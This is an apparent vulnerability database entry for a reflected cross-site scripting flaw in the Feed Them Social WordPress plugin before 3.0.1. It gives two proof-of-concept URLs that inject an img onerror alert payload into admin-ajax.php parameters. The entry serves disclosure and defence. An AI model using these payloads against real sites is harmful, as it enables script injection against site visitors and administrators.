Lucene search

K

Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting

🗓️ 26 Jul 2022 00:00:00Reported by dc11Type 
wpexploit
 wpexploit
👁 101 Views

Feed Them Social 3.0.1 - Reflected Cross-Site Scripting vulnerability in authenticated and unauthenticated user

Show more
Related
Code
Both can be used against authenticated and unauthenticated users

https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&access_token=<img src onerror=alert(/XSS/)>

https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=<img src onerror=alert(/XSS/)>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Jul 2022 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.001
101
.json
Report